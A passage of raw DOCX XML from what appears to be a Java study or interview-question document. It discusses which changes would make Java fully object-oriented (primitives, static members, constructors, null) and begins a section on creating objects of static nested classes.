          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>autoboxing</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unboxing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to automatically convert primitives to wrapper classes and vice versa, but to fully embrace OOP, everything would be manually boxed as objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4A5B85" w14:textId="77777777" w:rsidR="00501D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00501D1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41C12F0">
          <v:rect id="_x0000_i1148" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A5DA74" w14:textId="77777777" w:rsidR="00501D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00501D1B" w:rsidP="00501D1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Remove Static Methods and Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBA6584"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> members (variables and methods) are tied to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, not the instance, which breaks the OOP principle of everything being an object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D53678" w14:textId="77777777" w:rsidR="00501D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00501D1B" w:rsidP="00501D1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olution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2897784E"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would need to remove static methods and variables altogether.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EF1297"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stead of using static methods, you would need to call methods on </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (instances of classes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA904EB" w14:textId="77777777" w:rsidR="00501D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00501D1B" w:rsidP="00501D1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222E91F3"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stead of this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA35AE4" w14:textId="77777777" w:rsidR="007154B9" w:rsidRPr="00CE4B95"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439648"/>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4E28A16" w14:textId="77777777" w:rsidR="007154B9" w:rsidRPr="00CE4B95"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43964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cou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51D83CBE" w14:textId="77777777" w:rsidR="007154B9" w:rsidRPr="00CE4B95"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43964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6F9F1B30" w14:textId="77777777" w:rsidR="007154B9" w:rsidRPr="00CE4B95"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43964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incrementCou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5E2FC4B" w14:textId="77777777" w:rsidR="007154B9" w:rsidRPr="00CE4B95"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439648"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        count</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF5ACD4" w14:textId="77777777" w:rsidR="007154B9" w:rsidRPr="00CE4B95"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43964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2449CEE" w14:textId="5694500E" w:rsidR="007154B9" w:rsidRPr="00CE4B95"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439648"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19501F9A"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would need to remove the static keyword:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AB6AF8" w14:textId="77777777" w:rsidR="007154B9" w:rsidRPr="00CE4B95"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576767"/>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F336F15" w14:textId="77777777" w:rsidR="007154B9" w:rsidRPr="00CE4B95"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57676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cou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63393AF0" w14:textId="77777777" w:rsidR="007154B9" w:rsidRPr="00CE4B95"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57676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2596FFE0" w14:textId="77777777" w:rsidR="007154B9" w:rsidRPr="00CE4B95"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57676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incrementCou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CE3036D" w14:textId="77777777" w:rsidR="007154B9" w:rsidRPr="00CE4B95"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576767"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        count</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C073847" w14:textId="77777777" w:rsidR="007154B9" w:rsidRPr="00CE4B95"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57676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A1F5D7B" w14:textId="3C2CB902" w:rsidR="007154B9" w:rsidRPr="00CE4B95"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576767"/>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69015919"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this case, every </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> would need an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of MyClass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C3F915" w14:textId="77777777" w:rsidR="00501D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00501D1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40F34AA">
          <v:rect id="_x0000_i1149" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40379523" w14:textId="77777777" w:rsidR="00501D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00501D1B" w:rsidP="00501D1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Treat Constructors as Objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6138F5"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Java, constructors are special methods used to initialize objects, but they are not technically methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD2CF4B" w14:textId="77777777" w:rsidR="00501D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00501D1B" w:rsidP="00501D1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olution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1567443E"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o make Java 100% object-oriented, you could treat </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>constructors as objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. However, this isn’t possible in the current version of Java, as constructors are a part of the language syntax.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B1C9C1"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d need to shift to a language where even the construction of objects is treated as an operation on an object (like in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Smalltalk</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>), where everything is an object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0095B2AE" w14:textId="77777777" w:rsidR="00501D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00501D1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6642F6F">
          <v:rect id="_x0000_i1150" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F46E38" w14:textId="77777777" w:rsidR="00501D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00501D1B" w:rsidP="00501D1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Remove the null Keyword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013505E2"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null keyword represents the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>absence of an object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java, which means Java’s design recognizes the concept of "nothing," breaking the idea that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>everything is an object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2F5C2B" w14:textId="77777777" w:rsidR="00501D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00501D1B" w:rsidP="00501D1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olution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EFD47F"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move the concept of null, meaning that every object must be instantiated before it can be used. This is a theoretical idea that could make Java more object-oriented, but it would also increase complexity and have practical implications for memory management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB7E4ED" w14:textId="77777777" w:rsidR="00501D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00501D1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C7C685A">
          <v:rect id="_x0000_i1151" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D63B4D" w14:textId="77777777" w:rsidR="00501D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00501D1B" w:rsidP="00501D1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 of Changes to Make Java 100% Object-Oriented:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46ADE5B2"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liminate Primitive Data Types</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use only objects, no primitives (int, float, etc.), replacing them with their wrapper classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1851A6A6"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move Static Members</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: All methods and variables would have to be instance-level members, with no static context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F72DEA3"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reat Constructors as Objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In a truly object-oriented world, even object creation (constructors) would be handled in an object-like manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D3CCC3"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move null</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Every variable must always refer to a valid object, and null would be eliminated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C631B80" w14:textId="77777777" w:rsidR="00501D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00501D1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BBC12EB">
          <v:rect id="_x0000_i1152" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5122BBFD" w14:textId="77777777" w:rsidR="00501D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00501D1B" w:rsidP="00501D1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Realistic Consideration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C92C57B"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While making Java fully object-oriented would be an interesting exercise in OOP purity, it would introduce significant </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>performance overheads</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AEE117"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utoboxing</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unboxing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for primitives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FE0E4B"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need for managing more objects (even simple integers or booleans)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D770C0B" w14:textId="77777777" w:rsidR="00501D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00501D1B" w:rsidP="00501D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lexity in the language's design, potentially making it less efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3F547B" w14:textId="056B0CA9" w:rsidR="00501D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00501D1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A90992A">
          <v:rect id="_x0000_i1153" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB82AF9" w14:textId="668D7B7D" w:rsidR="00502865" w:rsidRPr="00CE4B95" w:rsidRDefault="00677441">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc196307514"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we create objects of static class</w:t>
      </w:r>
      <w:r w:rsidR="00502865" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="78BDEBB8" w14:textId="41F85FEE" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="00472E7A">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a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> typically refers to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nested static class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., a class declared as static inside another class). The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> keyword can be used with a nested class, but it has certain implications on object creation and behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2908E84F" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="007415D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E6CA3E">
          <v:rect id="_x0000_i1154" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C4D8EB" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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Understanding Static Classes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC28E60" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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Nested Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DD055D" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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nested static class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a class that is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>declared static</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside another class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4723B0CE" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>does not</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> have a reference to the outer class’s instance, meaning it can exist independently of the outer class’s instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F429797" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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can </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>create an object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a static nested class without needing an instance of the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BE6401" w14:textId="77777777" w:rsidR="007415DC" w:rsidRPr="00CE4B95" w:rsidRDefault="007415DC" w:rsidP="007415D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Inner Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
